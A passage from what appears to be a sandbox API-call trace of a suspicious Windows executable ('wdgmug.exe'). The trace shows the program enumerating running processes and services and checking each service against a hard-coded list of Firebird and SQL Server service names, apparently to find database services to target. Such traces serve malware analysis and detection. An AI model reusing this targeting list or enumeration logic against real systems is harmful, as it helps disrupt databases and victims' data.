szExeFile="svchost.exe")) returned 1 [0292.259] lstrlenW (lpString="svchost.exe") returned 11 [0292.259] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.259] lstrlenW (lpString="svchost.exe") returned 11 [0292.260] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.260] lstrlenW (lpString="svchost.exe") returned 11 [0292.260] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.261] lstrlenW (lpString="svchost.exe") returned 11 [0292.261] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.261] lstrlenW (lpString="svchost.exe") returned 11 [0292.261] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0292.262] lstrlenW (lpString="spoolsv.exe") returned 11 [0292.262] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.262] lstrlenW (lpString="svchost.exe") returned 11 [0292.262] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0292.263] lstrlenW (lpString="audiodg.exe") returned 11 [0292.263] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0292.263] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0292.263] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0292.264] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0292.264] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0292.265] lstrlenW (lpString="Memory Compression") returned 18 [0292.265] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0292.265] lstrlenW (lpString="sihost.exe") returned 10 [0292.265] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.266] lstrlenW (lpString="svchost.exe") returned 11 [0292.266] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0292.266] lstrlenW (lpString="taskhostw.exe") returned 13 [0292.266] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x48, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0292.267] lstrlenW (lpString="explorer.exe") returned 12 [0292.267] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0292.267] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0292.267] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0292.268] lstrlenW (lpString="SearchUI.exe") returned 12 [0292.268] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0292.269] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0292.269] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.269] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0292.269] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0292.270] lstrlenW (lpString="mobsync.exe") returned 11 [0292.270] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0292.270] lstrlenW (lpString="wdgmug.exe") returned 10 [0292.270] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0292.271] lstrlenW (lpString="cmd.exe") returned 7 [0292.271] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0292.271] lstrlenW (lpString="conhost.exe") returned 11 [0292.272] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0292.272] lstrlenW (lpString="wdgmug.exe") returned 10 [0292.272] Process32NextW (in: hSnapshot=0x454, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 0 [0292.273] CloseHandle (hObject=0x454) returned 1 [0292.273] Sleep (dwMilliseconds=0x1f4) [0293.157] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4013d40 [0293.158] EnumServicesStatusExW (in: hSCManager=0x4013d40, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0293.159] GetLastError () returned 0xea [0293.159] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1bc4) returned 0x4016da0 [0293.159] EnumServicesStatusExW (in: hSCManager=0x4013d40, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4016da0, cbBufSize=0x1bc4, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4016da0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0293.160] CloseServiceHandle (hSCObject=0x4013d40) returned 1 [0293.160] lstrlenW (lpString="AppXSvc") returned 7 [0293.160] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0293.160] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0293.160] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0293.160] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0293.160] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0293.160] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0293.160] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0293.160] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0293.160] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0293.160] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0293.160] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0293.160] lstrlenW (lpString="Audiosrv") returned 8 [0293.160] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0293.161] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0293.161] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0293.161] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0293.161] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0293.161] lstrlenW (lpString="BFE") returned 3 [0293.161] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0293.161] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0293.161] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0293.161] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0293.161] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0293.161] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0293.161] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0293.161] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0293.161] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0293.161] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0293.161] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0293.161] lstrlenW (lpString="CDPSvc") returned 6 [0293.161] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0293.161] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0293.161] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0293.161] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0293.161] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0293.161] lstrlenW (lpString="ClickToRunSvc") returned 13 [0293.161] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0293.161] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0293.161] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0293.161] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0293.161] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0293.162] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0293.162] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0293.162] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0293.162] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0293.162] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0293.162] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0293.162] lstrlenW (lpString="CryptSvc") returned 8 [0293.162] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0293.162] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0293.162] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0293.162] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0293.162] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0293.162] lstrlenW (lpString="DcomLaunch") returned 10 [0293.162] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0293.162] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0293.162] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0293.162] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0293.162] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0293.162] lstrlenW (lpString="DeviceAssociationService") returned 24 [0293.162] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0293.162] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0293.162] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0293.162] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0293.162] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0293.162] lstrlenW (lpString="Dhcp") returned 4 [0293.162] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0293.162] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0293.162] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0293.162] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0293.163] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0293.163] lstrlenW (lpString="Dnscache") returned 8 [0293.163] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0293.163] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0293.163] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0293.163] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0293.163] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0293.163] lstrlenW (lpString="DPS") returned 3 [0293.163] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0293.163] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0293.163] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0293.163] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0293.163] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0293.163] lstrlenW (lpString="DusmSvc") returned 7 [0293.163] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0293.163] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0293.163] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0293.163] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0293.163] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0293.163] lstrlenW (lpString="EventLog") returned 8 [0293.163] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0293.163] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0293.163] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0293.163] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0293.163] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0293.163] lstrlenW (lpString="EventSystem") returned 11 [0293.164] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0293.164] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0293.164] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0293.164] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0293.164] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0293.164] lstrlenW (lpString="FontCache") returned 9 [0293.164] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0293.164] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0293.164] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0293.164] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0293.164] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0293.164] lstrlenW (lpString="gpsvc") returned 5 [0293.164] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0293.164] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0293.164] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0293.164] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0293.164] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0293.164] lstrlenW (lpString="iphlpsvc") returned 8 [0293.164] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0293.164] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0293.164] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0293.164] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0293.164] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0293.165] lstrlenW (lpString="KeyIso") returned 6 [0293.165] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0293.165] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0293.165] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0293.165] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0293.165] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0293.165] lstrlenW (lpString="LanmanServer") returned 12 [0293.165] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0293.165] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0293.165] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0293.165] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0293.165] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0293.165] lstrlenW (lpString="LanmanWorkstation") returned 17 [0293.165] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0293.165] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0293.165] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0293.165] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0293.165] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0293.165] lstrlenW (lpString="lfsvc") returned 5 [0293.165] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0293.165] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0293.165] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0293.165] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0293.165] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0293.165] lstrlenW (lpString="lmhosts") returned 7 [0293.166] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0293.166] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0293.166] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0293.166] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0293.166] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0293.166] lstrlenW (lpString="LSM") returned 3 [0293.166] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0293.166] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0293.166] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0293.166] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0293.166] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0293.166] lstrlenW (lpString="MpsSvc") returned 6 [0293.166] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0293.166] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0293.166] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0293.166] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0293.166] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0293.166] lstrlenW (lpString="NcbService") returned 10 [0293.166] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0293.166] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0293.166] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0293.166] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0293.166] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0293.166] lstrlenW (lpString="netprofm") returned 8 [0293.166] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0293.166] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0293.166] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0293.166] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0293.166] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0293.166] lstrlenW (lpString="NgcSvc") returned 6 [0293.167] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0293.167] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0293.167] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0293.167] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0293.167] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0293.167] lstrlenW (lpString="NlaSvc") returned 6 [0293.167] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0293.167] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0293.167] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0293.167] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0293.167] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0293.167] lstrlenW (lpString="nsi") returned 3 [0293.167] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0293.167] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0293.167] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0293.167] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0293.167] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0293.167] lstrlenW (lpString="PcaSvc") returned 6 [0293.167] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0293.167] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0293.167] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0293.167] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0293.167] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0293.167] lstrlenW (lpString="PlugPlay") returned 8 [0293.167] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0293.167] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0293.167] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0293.168] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0293.168] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0293.168] lstrlenW (lpString="Power") returned 5 [0293.168] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0293.168] lstrcmpiW 